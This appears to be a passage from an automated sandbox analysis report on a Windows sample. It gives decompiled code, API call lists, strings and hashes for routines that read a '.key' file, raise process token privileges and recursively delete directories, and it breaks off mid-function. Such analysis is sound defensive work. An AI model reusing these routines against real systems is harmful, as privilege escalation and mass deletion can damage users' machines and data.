0x10008b94
0x10008ba5
0x10008baa
0x10008baa
0x10008bec
0x10008c0b
0x10008c14
0x10008c17
0x10008c1c
0x10008c22
0x10008c24
0x10008c25
0x10008c2b
0x10008c37
0x10008c3d
0x10008c41
0x10008c43
0x10008c43
0x10008c47
0x10008c48
0x10008c43
0x10008c51
0x10008c56
0x10008c57
0x10008c59
0x10008c5f
0x10008c63
0x10008c6e

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10008B71
PathFileExistsA.SHLWAPI(?), ref: 10008B7E
strcat.MSVCRT(?,10024988), ref: 10008B94
strcat.MSVCRT(?,Fatal,?,10024988), ref: 10008BA5
PathStripToRootA.SHLWAPI(?), ref: 10008BB8
strcat.MSVCRT(?,Windows\), ref: 10008BCA
strcat.MSVCRT(?,Fatal,?,Windows\), ref: 10008BDB
strcat.MSVCRT(?,.key,?,Fatal,?,Windows\), ref: 10008BEC
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10008C0B
GetFileSize.KERNEL32(00000000,00000000), ref: 10008C1C
#823.MFC42(00000000), ref: 10008C25
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10008C37
#825.MFC42(00000000), ref: 10008C59
CloseHandle.KERNEL32(?), ref: 10008C63

Strings

.key, xrefs: 10008BAA
Fatal, xrefs: 10008B9F, 10008BD5
.key, xrefs: 10008BE0
Windows\, xrefs: 10008BC4

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: strcat$File$Path$#823#825CloseCreateExistsFolderHandleReadRootSizeSpecialStrip
String ID: .key$.key$Fatal$Windows\
API String ID: 4242006425-763963170
Opcode ID: 908c448c6ef648b94807e29a9d50bdfd6182827a5a093429d18c6d4751d15617
Instruction ID: 1b1036b58219a6d6f15a8f71103759d1b915bd3a86c4a4c74025b07525588b88
Opcode Fuzzy Hash: 908c448c6ef648b94807e29a9d50bdfd6182827a5a093429d18c6d4751d15617
Instruction Fuzzy Hash: 2E313C71900218AAEB25DBA59C8AEDF76BCFF48244F9508A9F614E6141DB70DA848B20

Uniqueness

Uniqueness Score: -1.00%

Function 1000D096, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E1000D096(intOrPtr _a4, signed int _a8) {
				signed int _v5;
				void* _v12;
				struct HINSTANCE__* _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				_Unknown_base(*)()* _v28;
				signed int _v32;
				char _v40;
				char _v44;
				void* _t30;
				struct HINSTANCE__* _t45;

				_v5 = 1;
				_t45 = LoadLibraryA("ADVAPI32.dll");
				_v20 = GetProcAddress(_t45, "OpenProcessToken");
				_v28 = GetProcAddress(_t45, "AdjustTokenPrivileges");
				_v24 = GetProcAddress(_t45, "LookupPrivilegeValueA");
				_v16 = LoadLibraryA("kernel32.dll");
				_t30 = _v20(GetCurrentProcess(), 0x28,  &_v12);
				if(_t30 != 0) {
					_v44 = 1;
					asm("sbb eax, eax");
					_v32 =  ~_a8 & 0x00000002;
					_v24(0, _a4,  &_v40);
					_v28(_v12, 0,  &_v44, 0x10, 0, 0);
					if( *(GetProcAddress(LoadLibraryA("KERNEL32.dll"), "GetLastError"))() != 0) {
						_v5 = _v5 & 0x00000000;
					}
					CloseHandle(_v12);
					if(_t45 != 0) {
						FreeLibrary(_t45);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v5 & 0x000000ff;
				}
				return _t30;
			}

0x1000d0aa
0x1000d0b6
0x1000d0c6
0x1000d0d1
0x1000d0db
0x1000d0e0
0x1000d0f0
0x1000d0f5
0x1000d0fa
0x1000d103
0x1000d108
0x1000d114
0x1000d125
0x1000d13b
0x1000d13d
0x1000d13d
0x1000d144
0x1000d152
0x1000d155
0x1000d155
0x1000d15b
0x1000d160
0x1000d160
0x00000000
0x1000d162
0x1000d16a

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 1000D0AE
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000D0BE
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1000D0C9
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1000D0D4
LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000D0DE
GetCurrentProcess.KERNEL32(00000028,?), ref: 1000D0E9
LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1000D12D
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1000D135
CloseHandle.KERNEL32(?), ref: 1000D144
FreeLibrary.KERNEL32(00000000), ref: 1000D155
FreeLibrary.KERNEL32(00000000), ref: 1000D160

Strings

kernel32.dll, xrefs: 1000D0D6
KERNEL32.dll, xrefs: 1000D128
OpenProcessToken, xrefs: 1000D0B8
ADVAPI32.dll, xrefs: 1000D0A5
LookupPrivilegeValueA, xrefs: 1000D0CB
GetLastError, xrefs: 1000D12F
AdjustTokenPrivileges, xrefs: 1000D0C0

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Library$AddressProc$Load$Free$CloseCurrentHandleProcess
String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$kernel32.dll
API String ID: 2778819755-2902050685
Opcode ID: 6c0621c9022b67f7a776c7d728b89ac1db461ea0c3dc0dc3dafd4e92ca9a08b5
Instruction ID: 672bd1b15b6b8999d51c0bf6bb825b059fcf4caf91f86d27417c67ad4553969a
Opcode Fuzzy Hash: 6c0621c9022b67f7a776c7d728b89ac1db461ea0c3dc0dc3dafd4e92ca9a08b5
Instruction Fuzzy Hash: 6D213971D00219BAEB01ABF58C89BEFBFBCEF48251F404456F602E2150DB759A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10006687, Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10006687() {
				void* _t35;
				int _t37;
				void* _t53;
				void* _t62;
				void* _t63;
				void* _t65;
				intOrPtr _t66;

				E100158AC(E1001A3BE, _t63);
				_t66 = _t65 - 0x28;
				 *(_t63 - 4) =  *(_t63 - 4) & 0x00000000;
				L1001586C();
				_push("//*.*");
				_push(_t63 + 8);
				_push(_t63 - 0x10);
				 *(_t63 - 4) = 1;
				L10015830();
				_push(0);
				 *(_t63 - 4) = 2;
				_t35 = E1000865D(_t63 - 0x10);
				_push(_t35);
				L10015866();
				if(_t35 == 0) {
					L6:
					L10015872();
					_t37 = RemoveDirectoryA(E1000865D(_t63 + 8));
					 *(_t63 - 4) = 1;
					L1001580C();
					 *(_t63 - 4) =  *(_t63 - 4) & 0x00000000;
					L10015860();
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					L1001580C();
					 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
					return _t37;
				} else {
					goto L1;
				}
				do {
					L1:
					L1001588A();
					_t62 = _t35;
					L10015884();
					if(_t35 == 0) {
						_t53 = _t63 - 0x34;
						if(E100086F8(_t53) == 0) {
							_push(_t63 - 0x14);
							L1001587E();
							 *(_t63 - 4) = 3;
							_t35 = E1000865D(_t63 - 0x14);
							_push(_t35);
							L10015878();
							 *(_t63 - 4) = 2;
							L1001580C();
						} else {
							_push(_t53);
							 *((intOrPtr*)(_t63 - 0x18)) = _t66;
							_push(_t66);
							L1001587E();
							_t35 = E10006687();
						}
					}
				} while (_t62 != 0);
				goto L6;
			}

0x1000668c
0x10006691
0x10006695
0x1000669c
0x100066a4
0x100066a9
0x100066ad
0x100066ae
0x100066b2
0x100066b7
0x100066bc
0x100066c0
0x100066c5
0x100066c9
0x100066d0
0x10006738
0x1000673b
0x10006749
0x10006754
0x10006758
0x1000675d
0x10006764
0x10006769
0x10006770
0x1000677a
0x10006783
0x00000000
0x00000000
0x00000000
0x100066d2
0x100066d2
0x100066d5
0x100066dd
0x100066df
0x100066e6
0x100066e8
0x100066f2
0x10006711
0x10006712
0x10006719
0x1000671d
0x10006722
0x10006723
0x1000672b
0x1000672f
0x100066f4
0x100066f4
0x100066fa
0x100066fd
0x100066fe
0x10006703
0x10006708
0x100066f2
0x10006734
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1000668C
#356.MFC42(1200.exe), ref: 1000669C
#924.MFC42(?,?,//*.*,1200.exe), ref: 100066B2
#2770.MFC42(00000000,00000000,?,?,//*.*,1200.exe), ref: 100066C9
#2781.MFC42(00000000,00000000,?,?,//*.*,1200.exe), ref: 100066D5
#4058.MFC42(00000000,00000000,?,?,//*.*,1200.exe), ref: 100066DF
#3181.MFC42(?,?,00000000,00000000,?,?,//*.*,1200.exe), ref: 100066FE
#3181.MFC42(?,00000000,00000000,?,?,//*.*,1200.exe), ref: 10006712
#5583.MFC42(00000000,?,00000000,00000000,?,?,//*.*,1200.exe), ref: 10006723
#800.MFC42(00000000,?,00000000,00000000,?,?,//*.*,1200.exe), ref: 1000672F
#1980.MFC42(00000000,00000000,?,?,//*.*,1200.exe), ref: 1000673B
RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,?,?,//*.*,1200.exe), ref: 10006749
#800.MFC42 ref: 10006758
#668.MFC42 ref: 10006764
#800.MFC42 ref: 10006770

Strings

1200.exe, xrefs: 10006694
//*.*, xrefs: 100066A4

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #800$#3181$#1980#2770#2781#356#4058#5583#668#924DirectoryH_prologRemove
String ID: //*.*$1200.exe
API String ID: 2990529276-2026115979
Opcode ID: 3462aa10b6298c929465d5ac28d47593fb6fcf5318c37a9c286ba88209c05ec4
Instruction ID: 4968807215dad9a577cc84d5a3f7de931c0e080e3d9faa9829f76eb810b6ac86
Opcode Fuzzy Hash: 3462aa10b6298c929465d5ac28d47593fb6fcf5318c37a9c286ba88209c05ec4
Instruction Fuzzy Hash: F8319134802159EAEB04DBB4C952BEDBBB9EF18281F640058B401BB1C2EF31EB48C761

Uniqueness

Uniqueness Score: -1.00%

Function 00423C19, Relevance: 28.9, APIs: 19, Instructions: 423
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00423C19(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				signed int _t194;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				signed int _t291;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E004271DA(E0043B586, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E004272B2(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E004277B0(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x43fb38;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 = _t194 - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if(_t194 == _t257) {
					L37:
					_t295 = 0;
					E00422542(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E004277B0(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x441db4, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E00423BC2(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E0040A3F2(_t257, _t289, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E00422D09(_t300 - 0x68, _t289);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E0040A3F2(_t257, _t289, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M004241A9))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E004228AD(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E00415530(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E0040A3C7(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E00423469(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E004053A0(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E004053A0(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E004053A0(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E00429326(_t300 + 0x14, 0x44a184);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t291 = _t194 * _t290 >> 0x20;
					_t297 = E0040A3C7(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E004277B0(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M0042415D))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E00422981(_t300 - 0x34, _t299, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E00422DA3(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E0040A3F2(_t258, _t291, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M0042410D))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E00415700(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E00401E60(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E00415804(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 00423C20
_memset.LIBCMT ref: 00423C48
lstrlenA.KERNEL32(?), ref: 00423C58
_memset.LIBCMT ref: 00423CC2
_memset.LIBCMT ref: 00423ED8
VariantClear.OLEAUT32(?), ref: 00423F37
VariantClear.OLEAUT32(?), ref: 00423F5F
SysStringLen.OLEAUT32(?), ref: 00423FB9
SysFreeString.OLEAUT32(?), ref: 00423FD9
SysStringLen.OLEAUT32(?), ref: 00423FDE
SysFreeString.OLEAUT32(?), ref: 00423FF2
SysStringLen.OLEAUT32(?), ref: 00423FF7
SysFreeString.OLEAUT32(?), ref: 0042400B
__CxxThrowException@8.LIBCMT ref: 00424025
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 00424043
VariantClear.OLEAUT32(?), ref: 00424053

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID:
API String ID: 4128688680-0
Opcode ID: 2a04297b514a723936e790469be16231dc49ef034a5165d9722bc0ed815eb538
Instruction ID: d11820e7d694a3bf09781ad7c68ac7ffedb5b153e309257cf6eecd4800a06c85
Opcode Fuzzy Hash: 2a04297b514a723936e790469be16231dc49ef034a5165d9722bc0ed815eb538
Instruction Fuzzy Hash: EDF1AF71E00219DFDF10DFA8E884AAEBBB0FF04305F54406AE951AB290D7789E56CF59

Uniqueness

Uniqueness Score: -1.00%

Function 10006355, Relevance: 28.7, APIs: 19, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E10006355(void* __eflags) {
				void* _t53;
				signed int _t54;
				void* _t56;
				signed int _t60;
				intOrPtr _t63;
				signed int _t65;
				signed int _t66;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				void* _t77;
				signed int _t80;
				void* _t118;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t128;

				E100158AC(E1001A394, _t123);
				_t126 = _t125 - 0x24;
				 *(_t123 - 4) = 2;
				_t53 = E100086E2(_t123 + 0xc, __eflags);
				_t130 = _t53;
				if(_t53 != 0 || E100086E2(_t123 + 8, _t130) != 0) {
					L24:
					__eflags = 0;
					goto L25;
				} else {
					L1001586C();
					_t118 = 0;
					_push(0);
					 *(_t123 - 4) = 3;
					_t56 = E1000865D(_t123 + 8);
					_push(_t56);
					L10015866();
					if(_t56 == 0) {
						L23:
						 *(_t123 - 4) = 2;
						L10015860();
						goto L24;
					} else {
						_push(_t123 + 0xc);
						L1001585A();
						 *(_t123 - 4) = 4;
						_push(_t123 - 0x10);
						if(E100060EF() != 0) {
							L7:
							_t60 = E100086E2(_t123 + 0x10, __eflags);
							__eflags = _t60;
							if(_t60 == 0) {
								_push(E1000865D(_t123 + 0x10));
							} else {
								_push(_t118);
							}
							_push(E1000865D(_t123 + 8));
							_t63 = E10011594();
							__eflags = _t63 - _t118;
							 *0x10026994 = _t63;
							if(_t63 == _t118) {
								L22:
								 *(_t123 - 4) = 3;
								L1001580C();
								goto L23;
							} else {
								_t65 = E100116C6( *0x10026994, E1000865D(_t123 + 0xc));
								__eflags = _t65 - _t118;
								 *0x10026ac4 = _t65;
								if(_t65 == _t118) {
									_t66 = E100115C3( *0x10026994, 0xffffffff, 0x10026998);
									_t128 = _t126 + 0xc;
									__eflags = _t66 - _t118;
									 *0x10026ac4 = _t66;
									if(_t66 != _t118) {
										goto L12;
									} else {
										_t80 =  *0x10026998; // 0x0
										__eflags = _t80;
										if(_t80 <= 0) {
											L18:
											_t70 = E10011747( *0x10026994);
											_push( *0x10026994);
											__eflags = _t70;
